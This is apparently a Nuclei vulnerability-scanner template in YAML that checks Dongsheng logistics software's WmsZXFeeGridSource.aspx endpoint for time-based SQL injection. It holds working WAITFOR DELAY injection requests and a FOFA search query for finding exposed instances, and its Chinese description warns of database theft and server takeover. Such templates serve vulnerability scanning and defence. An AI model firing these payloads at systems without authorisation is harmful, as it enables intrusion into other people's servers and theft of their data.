http:
    - matchers:
        - dsl:
            - status_code == 200 && duration_1>=4 && duration_1<=5 && duration_2>=8 && duration_2<=9
          name: SQL注入
          type: dsl
      raw:
        - |
          GET /WMS_ZX/WmsZXFeeGridSource.aspx?read=areaname&areaname=-1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
          Host: {{Hostname}}
        - |
          GET /WMS_ZX/WmsZXFeeGridSource.aspx?read=areaname&areaname=-1%27;WAITFOR+DELAY+%270:0:8%27-- HTTP/1.1
          Host: {{Hostname}}
id: DongShengWuLiu-WmsZXFeeGridSource-SQL
info:
    author: HuanXiong
    description: |-
        fofa: app="东胜物流软件-物流软件"
        东胜物流软件 WmsZXFeeGridSource.aspx 接口处存在SQL注入漏洞，未经授权攻击者可通过该漏洞获取数据库敏感信息，进一步利用可获取服务器权限，导致网站处于极度不安全状态。
    name: 东胜物流软件 WmsZXFeeGridSource.aspx SQL注入
    reference:
        - null
    severity: high
    tags:
        - 东胜物流软件
